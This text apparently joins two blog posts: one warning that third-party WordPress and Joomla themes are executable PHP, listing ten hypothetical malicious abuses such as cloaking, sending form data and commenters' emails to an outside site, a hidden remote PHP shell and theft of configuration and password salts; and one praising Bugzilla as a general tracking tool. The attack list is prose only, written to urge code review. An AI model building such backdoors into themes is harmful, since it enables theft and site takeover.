Have you ever installed a theme or a component without reading and thoroughly understanding the source code of what you've just installed?

SEOmoz had a great article on Choosing the Right CMS Platform for Your Website and Dawud Miracle ran The Ultimate Resource For Free WordPress Themes . Both are great articles worth reading.

Everybody Loves Free Themes

What do these two seemingly unrelated articles have in common? They both implicitly guide readers towards using systems that are heavily dependent upon external themes. There's absolutely nothing wrong with that and I heartily support leveraging open source software where it makes sense. This blog runs on Joomla with several components and a commercial template from an outside vendor.

Themes and CMS

What is a theme within the framework of a content management system? A theme is just a mechanism for a content management system to separate the graphical user interface from the underlying code. Rather than trying to be all things to all people, the CMS developers have put hooks into the system that allows third parties to control what the user interface looks like without having to dive into the innards of the underlying system. It all works very well, and there are literally thousands of themes to choose from for just Word Press.

The Birds and Bees for Themes

So what's the catch? It's quite minor, but it could be disasterous if you don't know what you're doing. A theme is really just a collection of php files and the associate graphics and css files that allows the rendering of the page for the user. For instance, if you look at the directory structure of the default Wordpress theme you see something like:

404.php comments.php header.php page.php search.php archive.php comments-popup.php images rtl.css sidebar.php archives.php footer.php index.php screenshot.png single.php attachment.php functions.php links.php searchform.php style.css

All harmless enough. The different files implement "methods" for dealing with the different rendering events, so when it's time for the system to draw the footer of the page it just calls footer.php. Here's what the code looks like:

What?

That is the default theme from Wordpress - you get to give them a free link back to their site. Yes, it's linkware which is really a paid link and Google still counts it, but that's a different rant.

Leaving the Door Unlocked

But what else could a malicious person do? See the PHP statements? That tells the web server that it's no longer running HTML code and should now invoke the PHP processor to interpret this code. That php code can do all sorts of wonderful things. For a theme, it generally transfers something to the output stream that will end up on your web page. But there are literally thousands of functions available in PHP, and any code could be contained within a template. If someone had evil and very black hat intentions, they could:

Do These 10 Bad Things

1> Cloak your pages so that it looks normal to everyone except the search engine bots. They get shown a page of spammy links.

2> Implement an Ajax based function that sends any form data entered (for example, login and passwords from the comments) to an external web site.

3> Cloak your pages so that they look fine to you, but it someone enters the page on a search engine they get a different page with the evil template developer's adsense

4> Watch the IP addresses that view the pages (phone home) and make a good guess as to which addresses are probably the owner. Cloak the pages so that the site owner sees their own content, but everyone else see's the template developer's content.

5> Collect the email addresses of anyone who enters a comment and phone them home. In fact, in certain systems they could access the MySQL database and just query for all users and emails.

6> Change the ID's for ads and affiliate programs so that revenue flows to the theme producer and not the site owner.

7> Open a command window for pages served to certain IP addresses that allows the template developer to enter any PHP command (and thus any operating system command since PHP can shell out to the OS).

8> Send home the configuration data for the CMS, such as the administrator's user id and the "salt" for the password. If you don't know what the "salt" is, your takeaway should be that it's a lot easier to use brute force methods to decrypt someone's password if you know it.

9> Modify the robots.txt file so that search engines don't see any pages. Or do see the wrong pages. Or block the google-bot IP's and let ask.com through. Can you imagine the head-scratching to figure that out?

10> Ping the, er, ping services 1,000 times on each publish and comment so that you get banned.

Evil You

I was trying to come up with 10 because that's what you're supposed to do, and I thought it would be hard - it wasn't.

Don't think that I'm letting some super secret ideas out to the blackhat community. If they're good enough to do those things and evil enough to think of it, they've already figured it out.

Don't Panic!

Don't go screaming off into the night with fear that any Wordpress Theme you download is going to bite you. I personally have never seen a theme that did any of those things (with the exception of changing the Amazon Id -- I saw a plug-in that did that, but they were upfront about it in their documentation).

But I do read through the source code of any third party open source tool I'm going to install.

Do You?

We practically run our company on bugzilla , and not because we are drowning in bugs, but because we misue it the same way so many people over extend Excel. We'd probably feel less sheepish if it was named "Listzilla" or something.

Here's what we use it for:

• Bugs (natch)
• Feature requests
• System error reporting
• Editorial calendar development
  
• Collecting and grouping ideas for future products/projects
• Workflow task collection
• Customer Management
  

And probably a few more things that are just not coming to mind right now.

If someone asked me to name the top three or four pieces of open source software, bugzilla would certainly be right up there.

And, unlike switching from Windows to Linux, switching from an email based bug tracking systems (you email Wilma, she enters it into a spreadsheet) to bugzilla takes about five minutes. Installation is a breeze and it is lightweight enough to run on a teeny old laptop off in a corner somewhere.

System Error Reporting

One of the neat things you can do with bugzilla is to use one of the many plugins and have your other systems email/ping your bugzilla with a task when something goes awry.

For example, write a cron job that greps the "error" string out of your Apache logs and email it to bugzilla and assign it to your sysop.

Feature Request

It take two minutes to train someone to use bugzilla. When you're having a meeting have someone capture every "wouldn't it be neat it" idea and assign it to a project. You can discard stuff later, but this way you don't lose killer ideas.

Future Project Ideas

Sames as with features - why not collect all those things that come up in meetings and save them as future projects that can accumulate features until they're hatchable.

Editorial Calendar Development

Once again, you can catch the ideas as they flow.  Best of all, you can assign dates to each "bug" and assign them to specific users.   You can attach files to the items.   You can give external contractors logins and they can only see their assignments.

Customer Management

 If you do projects with customers then they will report bugs.  If you can train them to enter the bug, groovy.  If not, you can give them an email address to email their bugs into bugzilla.  When the bug is fixed you can setup bugzilla to email the customer that their stuff has been fixed.   You can also generate simple lists of open and closed issues so that you can more easily manage your weekly status calls.  (You do do that don't you?)

Best of All 

This is all free.   And easy to use.  How much stuff out there makes you look good,  is easy to use, and is free.  Hooah, Bugzilla!